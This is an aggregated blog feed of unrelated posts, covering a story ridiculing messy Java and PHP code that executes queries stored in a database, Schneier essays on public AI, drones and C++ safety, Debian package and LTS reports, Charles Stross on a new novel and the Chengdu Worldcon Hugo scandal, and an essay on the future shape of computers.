Rui recently pulled an all-nighter on a new contract. The underlying system is… complicated. There's a PHP front end, which also talks directly to the database, as well as a Java backend, which also talks to point-of-sale terminals. The high-level architecture is a bit of a mess.

The actual code architecture is also a mess.

For example, this code lives in the Java portion.

final class Status {
        static byte [] status;
        static byte [] normal = {22,18,18,18};

        //snip 

        public static boolean equals(byte[] array){
        boolean value=true;
        if(status[0]!=array[0])
                value=false;
        if(status[1]!=array[1])
                value=false;
        if(status[2]!=array[2])
                value=false;
        if(status[3]!=array[3])
                value=false;
        return value;
	}
}

The status information is represented as a string of four integers, with the normal status being the ever descriptive "22,18,18,18". Now, these clearly are code coming from the POS terminal, and clearly we know that there will always be four of them. But boy, it'd be nice if this code represented that more clearly. A for loop in the equals method might be nice, or given that there are four distinct status codes, maybe put them in variables with names?

But that's just the aperitif.

The PHP front end has code that looks like this:

$sql = "select query from table where id=X";
$result = mysql_query($sql);

// ... snip few lines of string munging on $result...

$result2 = mysql_query($result);

We fetch a field called "query" from the database, mangle it to inject some values, and then execute it as a query itself. You know exactly what's happening here: they're storing database queries in the database (so users can edit them! This always goes well!) and then the front end checks the database to know what queries it should be executing.

Rui is looking forward to the end of this contract.

[Advertisement] Otter - Provision your servers automatically without ever needing to log-in to a command prompt. Get started today!

Cryptogram How Public AI Can Strengthen Democracy

With the world’s focus turning to misinformationmanipulation, and outright propaganda ahead of the 2024 U.S. presidential election, we know that democracy has an AI problem. But we’re learning that AI has a democracy problem, too. Both challenges must be addressed for the sake of democratic governance and public protection.

Just three Big Tech firms (Microsoft, Google, and Amazon) control about two-thirds of the global market for the cloud computing resources used to train and deploy AI models. They have a lot of the AI talent, the capacity for large-scale innovation, and face few public regulations for their products and activities.

The increasingly centralized control of AI is an ominous sign for the co-evolution of democracy and technology. When tech billionaires and corporations steer AI, we get AI that tends to reflect the interests of tech billionaires and corporations, instead of the general public or ordinary consumers.

To benefit society as a whole we also need strong public AI as a counterbalance to corporate AI, as well as stronger democratic institutions to govern all of AI.

One model for doing this is an AI Public Option, meaning AI systems such as foundational large-language models designed to further the public interest. Like public roads and the federal postal system, a public AI option could guarantee universal access to this transformative technology and set an implicit standard that private services must surpass to compete.

Widely available public models and computing infrastructure would yield numerous benefits to the U.S. and to broader society. They would provide a mechanism for public input and oversight on the critical ethical questions facing AI development, such as whether and how to incorporate copyrighted works in model training, how to distribute access to private users when demand could outstrip cloud computing capacity, and how to license access for sensitive applications ranging from policing to medical use. This would serve as an open platform for innovation, on top of which researchers and small businesses—as well as mega-corporations—could build applications and experiment.

Versions of public AI, similar to what we propose here, are not unprecedented. Taiwan, a leader in global AI, has innovated in both the public development and governance of AI. The Taiwanese government has invested more than $7 million in developing their own large-language model aimed at countering AI models developed by mainland Chinese corporations. In seeking to make “AI development more democratic,” Taiwan’s Minister of Digital Affairs, Audrey Tang, has joined forces with the Collective Intelligence Project to introduce Alignment Assemblies that will allow public collaboration with corporations developing AI, like OpenAI and Anthropic. Ordinary citizens are asked to weigh in on AI-related issues through AI chatbots which, Tang argues, makes it so that “it’s not just a few engineers in the top labs deciding how it should behave but, rather, the people themselves.”

A variation of such an AI Public Option, administered by a transparent and accountable public agency, would offer greater guarantees about the availability, equitability, and sustainability of AI technology for all of society than would exclusively private AI development.

Training AI models is a complex business that requires significant technical expertise; large, well-coordinated teams; and significant trust to operate in the public interest with good faith. Popular though it may be to criticize Big Government, these are all criteria where the federal bureaucracy has a solid track record, sometimes superior to corporate America.

After all, some of the most technologically sophisticated projects in the world, be they orbiting astrophysical observatories, nuclear weapons, or particle colliders, are operated by U.S. federal agencies. While there have been high-profile setbacks and delays in many of these projects—the Webb space telescope cost billions of dollars and decades of time more than originally planned—private firms have these failures too. And, when dealing with high-stakes tech, these delays are not necessarily unexpected.

Given political will and proper financial investment by the federal government, public investment could sustain through technical challenges and false starts, circumstances that endemic short-termism might cause corporate efforts to redirect, falter, or even give up.

The Biden administration’s recent Executive Order on AI opened the door to create a federal AI development and deployment agency that would operate under political, rather than market, oversight. The Order calls for a National AI Research Resource pilot program to establish “computational, data, model, and training resources to be made available to the research community.”

While this is a good start, the U.S. should go further and establish a services agency rather than just a research resource. Much like the federal Centers for Medicare & Medicaid Services (CMS) administers public health insurance programs, so too could a federal agency dedicated to AI—a Centers for AI Services—provision and operate Public AI models. Such an agency can serve to democratize the AI field while also prioritizing the impact of such AI models on democracy—hitting two birds with one stone.

Like private AI firms, the scale of the effort, personnel, and funding needed for a public AI agency would be large—but still a drop in the bucket of the federal budget. OpenAI has fewer than 800 employees compared to CMS’s 6,700 employees and annual budget of more than $2 trillion. What’s needed is something in the middle, more on the scale of the National Institute of Standards and Technology, with its 3,400 staff, $1.65 billion annual budget in FY 2023, and extensive academic and industrial partnerships. This is a significant investment, but a rounding error on congressional appropriations like 2022’s $50 billion  CHIPS Act to bolster domestic semiconductor production, and a steal for the value it could produce. The investment in our future—and the future of democracy—is well worth it.

What services would such an agency, if established, actually provide? Its principal responsibility should be the innovation, development, and maintenance of foundational AI models—created under best practices, developed in coordination with academic and civil society leaders, and made available at a reasonable and reliable cost to all US consumers.

Foundation models are large-scale AI models on which a diverse array of tools and applications can be built. A single foundation model can transform and operate on diverse data inputs that may range from text in any language and on any subject; to images, audio, and video; to structured data like sensor measurements or financial records. They are generalists which can be fine-tuned to accomplish many specialized tasks. While there is endless opportunity for innovation in the design and training of these models, the essential techniques and architectures have been well established.

Federally funded foundation AI models would be provided as a public service, similar to a health care private option. They would not eliminate opportunities for private foundation models, but they would offer a baseline of price, quality, and ethical development practices that corporate players would have to match or exceed to compete.

And as with public option health care, the government need not do it all. It can contract with private providers to assemble the resources it needs to provide AI services. The U.S. could also subsidize and incentivize the behavior of key supply chain operators like semiconductor manufacturers, as we have already done with the CHIPS act, to help it provision the infrastructure it needs.

The government may offer some basic services on top of their foundation models directly to consumers: low hanging fruit like chatbot interfaces and image generators. But more specialized consumer-facing products like customized digital assistants, specialized-knowledge systems, and bespoke corporate solutions could remain the provenance of private firms.

The key piece of the ecosystem the government would dictate when creating an AI Public Option would be the design decisions involved in training and deploying AI foundation models. This is the area where transparency, political oversight, and public participation could affect more democratically-aligned outcomes than an unregulated private market.

Some of the key decisions involved in building AI foundation models are what data to use, how to provide pro-social feedback to “align” the model during training, and whose interests to prioritize when mitigating harms during deployment. Instead of ethically and legally questionable scraping of content from the web, or of users’ private data that they never knowingly consented for use by AI, public AI models can use public domain works, content licensed by the government, as well as data that citizens consent to be used for public model training.

Public AI models could be reinforced by labor compliance with U.S. employment laws and public sector employment best practices. In contrast, even well-intentioned corporate projects sometimes have committed labor exploitation and violations of public trust, like Kenyan gig workers giving endless feedback on the most disturbing inputs and outputs of AI models at profound personal cost.

And instead of relying on the promises of profit-seeking corporations to balance the risks and benefits of who AI serves, democratic processes and political oversight could regulate how these models function. It is likely impossible for AI systems to please everybody, but we can choose to have foundation AI models that follow our democratic principles and protect minority rights under majority rule.

Foundation models funded by public appropriations (at a scale modest for the federal government) would obviate the need for exploitation of consumer data and would be a bulwark against anti-competitive practices, making these public option services a tide to lift all boats: individuals’ and corporations’ alike. However, such an agency would be created among shifting political winds that, recent history has shown, are capable of alarming and unexpected gusts. If implemented, the administration of public AI can and must be different. Technologies essential to the fabric of daily life cannot be uprooted and replanted every four to eight years. And the power to build and serve public AI must be handed to democratic institutions that act in good faith to uphold constitutional principles.

Speedy and strong legal regulations might forestall the urgent need for development of public AI. But such comprehensive regulation does not appear to be forthcoming. Though several large tech companies have said they will take important steps to protect democracy in the lead up to the 2024 election, these pledges are voluntary and in places nonspecific. The U.S. federal government is little better as it has been slow to take steps toward corporate AI legislation and regulation (although a new bipartisan task force in the House of Representatives seems determined to make progress). On the state level, only four jurisdictions have successfully passed legislation that directly focuses on regulating AI-based misinformation in elections. While other states have proposed similar measures, it is clear that comprehensive regulation is, and will likely remain for the near future, far behind the pace of AI advancement. While we wait for federal and state government regulation to catch up, we need to simultaneously seek alternatives to corporate-controlled AI.

In the absence of a public option, consumers should look warily to two recent markets that have been consolidated by tech venture capital. In each case, after the victorious firms established their dominant positions, the result was exploitation of their userbases and debasement of their products. One is online search and social media, where the dominant rise of Facebook and Google atop a free-to-use, ad supported model demonstrated that, when you’re not paying, you are the product. The result has been a widespread erosion of online privacy and, for democracy, a corrosion of the information market on which the consent of the governed relies. The other is ridesharing, where a decade of VC-funded subsidies behind Uber and Lyft squeezed out the competition until they could raise prices.

The need for competent and faithful administration is not unique to AI, and it is not a problem we can look to AI to solve. Serious policymakers from both sides of the aisle should recognize the imperative for public-interested leaders not to abdicate control of the future of AI to corporate titans. We do not need to reinvent our democracy for AI, but we do need to renovate and reinvigorate it to offer an effective alternative to untrammeled corporate control that could erode our democracy.

365 TomorrowsA Time and Place for Things

Author: Soramimi Hanarejima When the Bureau of Introspection discovered how to photograph the landscapes within us, we were all impressed that this terrain, which had only been visible in dreams, could be captured and viewed by anyone. This struck us as a huge leap, but toward what, we couldn’t say. We thought seeing our own […]

The post A Time and Place for Things appeared first on 365tomorrows.

Cryptogram Drones and the US Air Force

Fascinating analysis of the use of drones on a modern battlefield—that is, Ukraine—and the inability of the US Air Force to react to this change.

The F-35A certainly remains an important platform for high-intensity conventional warfare. But the Air Force is planning to buy 1,763 of the aircraft, which will remain in service through the year 2070. These jets, which are wholly unsuited for countering proliferated low-cost enemy drones in the air littoral, present enormous opportunity costs for the service as a whole. In a set of comments posted on LinkedIn last month, defense analyst T.X. Hammes estimated the following. The delivered cost of a single F-35A is around $130 million, but buying and operating that plane throughout its lifecycle will cost at least $460 million. He estimated that a single Chinese Sunflower suicide drone costs about $30,000—so you could purchase 16,000 Sunflowers for the cost of one F-35A. And since the full mission capable rate of the F-35A has hovered around 50 percent in recent years, you need two to ensure that all missions can be completed—for an opportunity cost of 32,000 Sunflowers. As Hammes concluded, “Which do you think creates more problems for air defense?”

Ironically, the first service to respond decisively to the new contestation of the air littoral has been the U.S. Army. Its soldiers are directly threatened by lethal drones, as the Tower 22 attack demonstrated all too clearly. Quite unexpectedly, last month the Army cancelled its future reconnaissance helicopter ­ which has already cost the service $2 billion—because fielding a costly manned reconnaissance aircraft no longer makes sense. Today, the same mission can be performed by far less expensive drones—without putting any pilots at risk. The Army also decided to retire its aging Shadow and Raven legacy drones, whose declining survivability and capabilities have rendered them obsolete, and announced a new rapid buy of 600 Coyote counter-drone drones in order to help protect its troops.

Cryptogram Improving C++

C++ guru Herb Sutter writes about how we can improve the programming language for better security.

The immediate problem “is” that it’s Too Easy By Default™ to write security and safety vulnerabilities in C++ that would have been caught by stricter enforcement of known rules for type, bounds, initialization, and lifetime language safety.

His conclusion:

We need to improve software security and software safety across the industry, especially by improving programming language safety in C and C++, and in C++ a 98% improvement in the four most common problem areas is achievable in the medium term. But if we focus on programming language safety alone, we may find ourselves fighting yesterday’s war and missing larger past and future security dangers that affect software written in any language.

Cryptogram Friday Squid Blogging: New Species of Squid Discovered

A new species of squid was discovered, along with about a hundred other species.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Cryptogram Friday Squid Blogging: Operation Squid

Operation Squid found 1.3 tons of cocaine hidden in frozen fish.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Planet DebianDirk Eddelbuettel: ciw 0.0.1 on CRAN: New Package!

Happy to share that ciw is now on CRAN! I had tooted a little bit about it, e.g., here. What it provides is a single (efficient) function incoming() which summarises the state of the incoming directories at CRAN. I happen to like having these things at my (shell) fingertips, so it goes along with (still draft) wrapper ciw.r that will be part of the next littler release.

For example, when I do this right now as I type this, I see

which is rather compact as CRAN kept busy! This call runs in about (or just over) one second, which includes launching r. Good enough for me. From a well-connected EC2 instance it is about 800ms on the command-line. When I do I from here inside an R session it is maybe 700ms. And doing it over in Europe is faster still. (I am using ping=FALSE for these to omit the default sanity check of ‘can I haz networking?’ to speed things up. The check adds another 200ms or so.)

The function (and the wrapper) offer a ton of options too this is ridiculously easy to do thanks to the docopt package:

The README at the git repo and the CRAN page offer a ‘screenshot movie’ showing some of the options in action.

I have been using the little tools quite a bit over the last two or three weeks since I first put it together and find it quite handy. With that again a big Thank You! of appcreciation for all that CRAN does—which this week included letting this past the newbies desk in under 24 hours.

If you like this or other open-source work I do, you can sponsor me at GitHub.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Planet DebianFreexian Collaborators: Monthly report about Debian Long Term Support, February 2024 (by Roberto C. Sánchez)

Like each month, have a look at the work funded by Freexian’s Debian LTS offering.

Debian LTS contributors

In February, 18 contributors have been paid to work on Debian LTS, their reports are available:

  • Abhijith PA did 10.0h (out of 14.0h assigned), thus carrying over 4.0h to the next month.
  • Adrian Bunk did 13.5h (out of 24.25h assigned and 41.75h from previous period), thus carrying over 52.5h to the next month.
  • Bastien Roucariès did 20.0h (out of 20.0h assigned).
  • Ben Hutchings did 2.0h (out of 14.5h assigned and 9.5h from previous period), thus carrying over 22.0h to the next month.
  • Chris Lamb did 18.0h (out of 18.0h assigned).
  • Daniel Leidert did 10.0h (out of 10.0h assigned).
  • Emilio Pozuelo Monfort did 3.0h (out of 28.25h assigned and 31.75h from previous period), thus carrying over 57.0h to the next month.
  • Guilhem Moulin did 7.25h (out of 4.75h assigned and 15.25h from previous period), thus carrying over 12.75h to the next month.
  • Holger Levsen did 0.5h (out of 3.5h assigned and 8.5h from previous period), thus carrying over 11.5h to the next month.
  • Lee Garrett did 0.0h (out of 18.25h assigned and 41.75h from previous period), thus carrying over 60.0h to the next month.
  • Markus Koschany did 40.0h (out of 40.0h assigned).
  • Roberto C. Sánchez did 3.5h (out of 8.75h assigned and 3.25h from previous period), thus carrying over 8.5h to the next month.
  • Santiago Ruano Rincón did 13.5h (out of 13.5h assigned and 2.5h from previous period), thus carrying over 2.5h to the next month.
  • Sean Whitton did 4.5h (out of 0.5h assigned and 5.5h from previous period), thus carrying over 1.5h to the next month.
  • Sylvain Beucler did 24.5h (out of 27.75h assigned and 32.25h from previous period), thus carrying over 35.5h to the next month.
  • Thorsten Alteholz did 14.0h (out of 14.0h assigned).
  • Tobias Frost did 12.0h (out of 12.0h assigned).
  • Utkarsh Gupta did 11.25h (out of 26.75h assigned and 33.25h from previous period), thus carrying over 48.75 to the next month.

Evolution of the situation

In February, we have released 17 DLAs.

The number of DLAs published during February was a bit lower than usual, as there was much work going on in the area of triaging CVEs (a number of which turned out to not affect Debia buster, and others which ended up being duplicates, or otherwise determined to be invalid). Of the packages which did receive updates, notable were sudo (to fix a privilege management issue), and iwd and wpa (both of which suffered from authentication bypass vulnerabilities).

While this has already been already announced in the Freexian blog, we would like to mention here the start of the Long Term Support project for Samba 4.17. You can find all the important details in that post, but we would like to highlight that it is thanks to our LTS sponsors that we are able to fund the work from our partner, Catalyst, towards improving the security support of Samba in Debian 12 (Bookworm).

Thanks to our sponsors

Sponsors that joined recently are in bold.

,

Charles StrossA message from our sponsors: New Book coming!

(You probably expected this announcement a while ago ...)

I've just signed a new two book deal with my publishers, Tor.com publishing in the USA/Canada and Orbit in the UK/rest of world, and the book I'm talking about here and now—the one that's already written and delivered to the Production people who turn it into a thing you'll be able to buy later this year—is a Laundry stand-alone titled "A Conventional Boy".

("Delivered to production" means it is now ready to be copy-edited, typeset, printed/bound/distributed and simultaneously turned into an ebook and pushed through the interwebbytubes to the likes of Kobo and Kindle. I do not have a publication date or a link where you can order it yet: it almost certainly can't show up before July at this point. Yes, everything is running late. No, I have no idea why.)

"A Conventional Boy" is not part of the main (and unfinished) Laundry Files story arc. Nor is it a New Management story. It's a stand-alone story about Derek the DM, set some time between the end of "The Fuller Memorandum" and before "The Delirium Brief". We met Derek originally in "The Nightmare Stacks", and again in "The Labyrinth Index": he's a portly, short-sighted, middle-aged nerd from the Laundry's Forecasting Ops department who also just happens to be the most powerful precognitive the Laundry has tripped over in the past few decades—and a role playing gamer.

When Derek was 14 years old and running a D&D campaign, a schoolteacher overheard him explaining D&D demons to his players and called a government tips hotline. Thirty-odd years later Derek has lived most of his life in Camp Sunshine, the Laundry's magical Gitmo for Elder God cultists. As a trusty/"safe" inmate, he produces the camp newsletter and uses his postal privileges to run a play-by-mail RPG. One day, two pieces of news cross Derek's desk: the camp is going to be closed down and rebuilt as a real prison, and a games convention is coming to the nearest town.

Camp Sunshine is officially escape-proof, but Derek has had a foolproof escape plan socked away for the past decade. He hasn't used it because until now he's never had anywhere to escape to. But now he's facing the demolition of his only home, and he has a destination in mind. Come hell or high water, Derek intends to go to his first ever convention. Little does he realize that hell is also going to the convention ...

I began writing "A Conventional Boy" in 2009, thinking it'd make a nice short story. It went on hold for far too long (it was originally meant to come out before "The Nightmare Stacks"!) but instead it lingered ... then when I got back to work on it, the story ran away and grew into a short novel in its own right. As it's rather shorter than the other Laundry novels (although twice as long as, say, "Equoid") the book also includes "Overtime" and "Escape from Yokai Land", both Laundry Files novelettes about Bob, and an afterword providing some background on the 1980s Satanic D&D Panic for readers who don't remember it (which sadly means anyone much younger than myself).

Questions? Ask me anything!

Charles StrossWorldcon in the news

You've probably seen news reports that the Hugo awards handed out last year at the world science fiction convention in Chengdu were rigged. For example: Science fiction awards held in China under fire for excluding authors.

The Guardian got bits of the background wrong, but what's undeniably true is that it's a huge mess. And the key point the press and most of the public miss is that they seem to think there's some sort of worldcon organization that can fix this.

Spoiler: there isn't.

(Caveat: what follows below the cut line is my brain dump, from 20km up, in lay terms, of what went wrong. I am not a convention runner and I haven't been following the Chengdu mess obsessively. If you want the inside baseball deets, read the File770 blog. If you want to see the rulebook, you can find it here (along with a bunch more stuff). I am on the outside of the fannish discourse and flame wars on this topic, and I may have misunderstood some of the details. I'm open to authoritative corrections and will update if necessary.)

SF conventions are generally fan-run (amateur) get-togethers, run on a non-profit/volunteer basis. There are some exceptions (the big Comiccons like SDCC, a couple of really large fan conventions that out-grew the scale volunteers can run them on so pay full-time staff) but generally they're very amateurish.

SF conventions arose organically out of SF fan clubs that began holding face to face meet-ups in the 1930s. Many of them are still run by local fan clubs and usually they stick to the same venue for decades: for example, the long-running Boskone series of conventions in Boston is run by NESFA, the New England SF Association; Novacon in the UK is run by the Birmingham SF Group. Both have been going for over 50 years now.

Others are less location-based. In the UK, there are the British Eastercons held over the easter (long) bank holiday weekend every year in a different city. It's a notionally national SF convention, although historically it's tended to be London-centric. They're loosely associated with the BSFA, which announces it's own SF awards (the BSFA awards) at the eastercon.

Because it's hard to run a convention when you live 500km from the venue, local SF societies or organizer teams talk to hotels and put together a bid for the privilege of working their butts off for a weekend. Then, a couple of years before the convention, there's a meeting and a vote at the preceding-but-one con in the series where the members vote on where to hold that year's convention.

Running a convention is not expense-free, so it's normal to charge for membership. (Nobody gets paid, but conventions host guests of honour—SF writers, actors, and so on—and they get their membership, hotel room, and travel expenses comped in the expectation that they'll stick around and give talks/sign books/shake hands with the members.)

What's less well-known outside the bubble is that it's also normal to offer "pre-supporting" memberships (to fund a bid) and "supporting" memberships (you can't make it to the convention that won the bidding war but you want to make a donation). Note that such partial memberships are upgradable later for the difference in cost if you decide to attend the event.

The world science fiction convention is the name of a long-running series of conventions (the 82nd one is in Glasgow this August) that are held annually. There is a rule book for running a worldcon. For starters, the venue is decided by a bidding war between sites (as above). For seconds, members of the convention are notionally buying membership, for one year, in the World Science Fiction Society (WSFS). The rule book for running a worldcon is the WSFS constitution, and it lays down the rules for:

  • Voting on where the next-but-one worldcon will be held ("site selection")
  • Holding a business meeting where motions to amend the WSFS constitution can be discussed and voted on (NB: to be carried a motion must be proposed and voted through at two consecutive worldcons)
  • Running the Hugo awards

The important thing to note is that the "worldcon" is *not a permanent organization. It's more like a virus that latches onto an SF convention, infects it with worldcon-itis, runs the Hugo awards and the WSFS business meeting, then selects a new convention to parasitize the year after next.

No worldcon binds the hands of the next worldcon, it just passes the baton over in the expectation that the next baton-holder will continue the process rather than, say, selling the baton off to be turned into matchsticks.

This process worked more or less fine for eighty years, until it ran into Chengdu.

Worldcons are volunteer, fan-organized, amateur conventions. They're pretty big: the largest hit roughly 14,000 members, and they average 4000-8000. (I know of folks who used "worked on a British eastercon committee" as their dissertation topic for degrees in Hospitality Management; you don't get to run a worldcon committee until you're way past that point.) But SF fandom is a growing community thing in China. And even a small regional SF convention in China is quite gigantic by most western (trivially, US/UK) standards.

My understanding is that a bunch of Chinese fans who ran a successful regional convention in Chengdu (population 21 million; slightly more than the New York metropolitan area, about 30% more than London and suburbs) heard about the worldcon and thought "wouldn't it be great if we could call ourselves the world science fiction convention?"

They put together a bid, then got a bunch of their regulars to cough up $50 each to buy a supporting membership in the 2021 worldcon and vote in site selection. It doesn't take that many people to "buy" a worldcon—I seem to recall it's on the order of 500-700 votes—so they bought themselves the right to run the worldcon in 2023. And that's when the fun and games started.

See, Chinese fandom is relatively isolated from western fandom. And the convention committee didn't realize that there was this thing called the WSFS Constitution which set out rules for stuff they had to do. I gather they didn't even realize they were responsible for organizing the nomination and voting process for the Hugo awards, commissioning the award design, and organizing an awards ceremony, until about 12 months before the convention (which is short notice for two rounds of voting. commissioning a competition between artists to design the Hugo award base for that year, and so on). So everything ran months too late, and they had to delay the convention, and most of the students who'd pitched in to buy those bids could no longer attend because of bad timing, and worse ... they began picking up an international buzz, which in turn drew the attention of the local Communist Party, in the middle of the authoritarian clamp-down that's been intensifying for the past couple of years. (Remember, it takes a decade to organize a successful worldcon from initial team-building to running the event. And who imagined our existing world of 2023 back in 2013?)

The organizers appear to have panicked.

First they arbitrarily disqualified a couple of very popular works by authors who they thought might offend the Party if they won and turned up to give an acceptance speech (including "Babel", by R. F. Kuang, which won the Nebula and Locus awards in 2023 and was a favourite to win the Hugo as well).

Then they dragged their heels on releasing the vote counts—the WSFS Constitution requires the raw figures to be released after the awards are handed out.

Then there were discrepancies in the count of votes cast, such that the raw numbers didn't add up.

The haphazard way they released the data suggests that the 911 call is coming from inside the house: the convention committee freaked out when they realized the convention had become a political hot potato, rigged the vote badly, and are now farting smoke signals as if to say "a secret policeman hinted that it could be very unfortunate if we didn't anticipate the Party's wishes".

My take-away:

The world science fiction convention coevolved with fan-run volunteer conventions in societies where there's a general expectation of the rule of law and most people abide by social norms irrespective of enforcement. The WSFS constitution isn't enforceable except insofar as normally fans see no reason not to abide by the rules. So it works okay in the USA, the UK, Canada, the Netherlands, Japan, Australia, New Zealand, and all the other western-style democracies it's been held in ... but broke badly when a group of enthusiasts living in an authoritarian state won the bid then realized too late that by doing so they'd come to the attention of Very Important People who didn't care about their society's rulebook.

Immediate consequences:

For the first fifty or so worldcons, worldcon was exclusively a North American phenomenon except for occasional sorties to the UK. Then it began to open up as cheap air travel became a thing. In the 21st century about 50% of worldcons are held outside North America, and until 2016 there was an expectation that it would become truly international.

But the Chengdu fubar has created shockwaves. There's no immediate way to fix this, any more than you'll be able to fix Donald Trump declaring himself dictator-for-life on the Ides of March in 2025 if he gets back into the White House with a majority in the House and Senate. It needs a WSFS constitutional amendment at least (so pay attention to the motions and voting in Glasgow, and then next year, in Seattle) just to stop it happening again. And nobody has ever tried to retroactively invalidate the Hugo awards. While there's a mechanism for running Hugo voting and handing out awards for a year in which there was no worldcon (the Retrospective Hugo awards—for example, the 1945 Hugo Awards were voted on in 2020—nobody considered the need to re-run the Hugos for a year in which the vote was rigged. So there's no mechanism.

The fallout from Chengdu has probably sunk several other future worldcon bids—and it's not as if there are a lot of teams competing for the privilege of working themselves to death: Glasgow and Seattle (2024 and 2025) both won their bidding by default because they had experienced, existing worldcon teams and nobody else could be bothered turning up. So the Ugandan worldcon bid has collapsed (and good riddance, many fans would vote NO WORLDCON in preference to a worldcon in a nation that recently passed a law making homosexuality a capital offense). The Saudi Arabian bid also withered on the vine, but took longer to finally die. They shifted their venue to Cairo in a desperate attempt to overcome Prince Bone-saw's negative PR optics, but it hit the buffers when the Egyptian authorities refused to give them the necessary permits. Then there's the Tel Aviv bid. Tel Aviv fans are lovely people, but I can't see an Israeli worldcon being possible in the foreseeable future (too many genocide cooties right now). Don't ask about Kiev (before February 2022 they were considering bidding for the Eurocon). And in the USA, the prognosis for successful Texas and Florida worldcon bids are poor (book banning does not go down well with SF fans).

Beyond Seattle in 2025, the sole bid standing for 2026 (now the Saudi bid has died) is Los Angeles. Tel Aviv is still bidding for 2027, but fat chance: Uganda is/was targeting 2028, and there was some talk of a Texas bid in 2029 (all these are speculative bids and highly unlikely to happen in my opinion). I am also aware of a bid for a second Dublin worldcon (they've got a shiny new conference centre), targeting 2029 or 2030. There may be another Glasgow or London bid in the mid-30s, too. But other than that? I'm too out of touch with current worldcon politics to say, other than, watch this space (but don't buy the popcorn from the concession stand, it's burned and bitter).

UPDATE

A commenter just drew my attention to this news item on China.org.cn, dated October 23rd, 2023, right after the worldcon. It begins:

Investment deals valued at approximately $1.09 billion were signed during the 81st World Science Fiction Convention (Worldcon) held in Chengdu, Sichuan province, last week at its inaugural industrial development summit, marking significant progress in the advancement of sci-fi development in China.

The deals included 21 sci-fi industry projects involving companies that produce films, parks, and immersive sci-fi experiences ..."

That's a metric fuckton of moolah in play, and it would totally account for the fan-run convention folks being discreetly elbowed out of the way and the entire event being stage-managed as a backdrop for a major industrial event to bootstrap creative industries (film, TV, and games) in Chengdu. And—looking for the most charitable interpretation here—the hapless western WSFS people being carried along for the ride to provide a veneer of worldcon-ness to what was basically Chinese venture capital hijacking the event and then sanitizing it politically.

Follow the money.

Planet DebianRussell Coker: The Shape of Computers

Introduction

There have been many experiments with the sizes of computers, some of which have stayed around and some have gone away. The trend has been to make computers smaller, the early computers had buildings for them. Recently for come classes computers have started becoming as small as could be reasonably desired. For example phones are thin enough that they can blow away in a strong breeze, smart watches are much the same size as the old fashioned watches they replace, and NUC type computers are as small as they need to be given the size of monitors etc that they connect to.

This means that further development in the size and shape of computers will largely be determined by human factors.

I think we need to consider how computers might be developed to better suit humans and how to write free software to make such computers usable without being constrained by corporate interests.

Those of us who are involved in developing OSs and applications need to consider how to adjust to the changes and ideally anticipate changes. While we can’t anticipate the details of future devices we can easily predict general trends such as being smaller, higher resolution, etc.

Desktop/Laptop PCs

When home computers first came out it was standard to have the keyboard in the main box, the Apple ][ being the most well known example. This has lost popularity due to the demand to have multiple options for a light keyboard that can be moved for convenience combined with multiple options for the box part. But it still pops up occasionally such as the Raspberry Pi 400 [1] which succeeds due to having the computer part being small and light. I think this type of computer will remain a niche product. It could be used in a “add a screen to make a laptop” as opposed to the “add a keyboard to a tablet to make a laptop” model – but a tablet without a keyboard is more useful than a non-server PC without a display.

The PC as “box with connections for keyboard, display, etc” has a long future ahead of it. But the sizes will probably decrease (they should have stopped making PC cases to fit CD/DVD drives at least 10 years ago). The NUC size is a useful option and I think that DVD drives will stop being used for software soon which will allow a range of smaller form factors.

The regular laptop is something that will remain useful, but the tablet with detachable keyboard devices could take a lot of that market. Full functionality for all tasks requires a keyboard because at the moment text editing with a touch screen is an unsolved problem in computer science [2].

The Lenovo Thinkpad X1 Fold [3] and related Lenovo products are very interesting. Advances in materials allow laptops to be thinner and lighter which leaves the screen size as a major limitation to portability. There is a conflict between desiring a large screen to see lots of content and wanting a small size to carry and making a device foldable is an obvious solution that has recently become possible. Making a foldable laptop drives a desire for not having a permanently attached keyboard which then makes a touch screen keyboard a requirement. So this means that user interfaces for PCs have to be adapted to work well on touch screens. The Think line seems to be continuing the history of innovation that it had when owned by IBM. There are also a range of other laptops that have two regular screens so they are essentially the same as the Thinkpad X1 Fold but with two separate screens instead of one folding one, prices are as low as $600US.

I think that the typical interfaces for desktop PCs (EG MS-Windows and KDE) don’t work well for small devices and touch devices and the Android interface generally isn’t a good match for desktop systems. We need to invent more options for this. This is not a criticism of KDE, I use it every day and it works well. But it’s designed for use cases that don’t match new hardware that is on sale. As an aside it would be nice if Lenovo gave samples of their newest gear to people who make significant contributions to GUIs. Give a few Thinkpad Fold devices to KDE people, a few to GNOME people, and a few others to people involved in Wayland development and see how that promotes software development and future sales.

We also need to adopt features from laptops and phones into desktop PCs. When voice recognition software was first released in the 90s it was for desktop PCs, it didn’t take off largely because it wasn’t very accurate (none of them recognised my voice). Now voice recognition in phones is very accurate and it’s very common for desktop PCs to have a webcam or headset with a microphone so it’s time for this to be re-visited. GPS support in laptops is obviously useful and can work via Wifi location, via a USB GPS device, or via wwan mobile phone hardware (even if not used for wwan networking). Another possibility is using the same software interfaces as used for GPS on laptops for a static definition of location for a desktop PC or server.

The Interesting New Things

Watch Like

The wrist-watch [4] has been a standard format for easy access to data when on the go since it’s military use at the end of the 19th century when the practical benefits beat the supposed femininity of the watch. So it seems most likely that they will continue to be in widespread use in computerised form for the forseeable future. For comparison smart phones have been in widespread use as “pocket watches” for about 10 years.

The question is how will watch computers end up? Will we have Dick Tracy style watch phones that you speak into? Will it be the current smart watch functionality of using the watch to answer a call which goes to a bluetooth headset? Will smart watches end up taking over the functionality of the calculator watch [5] which was popular in the 80’s? With today’s technology you could easily have a fully capable PC strapped to your forearm, would that be useful?

Phone Like

Folding phones (originally popularised as Star Trek Tricorders) seem likely to have a long future ahead of them. Engineering technology has only recently developed to the stage of allowing them to work the way people would hope them to work (a folding screen with no gaps). Phones and tablets with multiple folds are coming out now [6]. This will allow phones to take much of the market share that tablets used to have while tablets and laptops merge at the high end. I’ve previously written about Convergence between phones and desktop computers [7], the increased capabilities of phones adds to the case for Convergence.

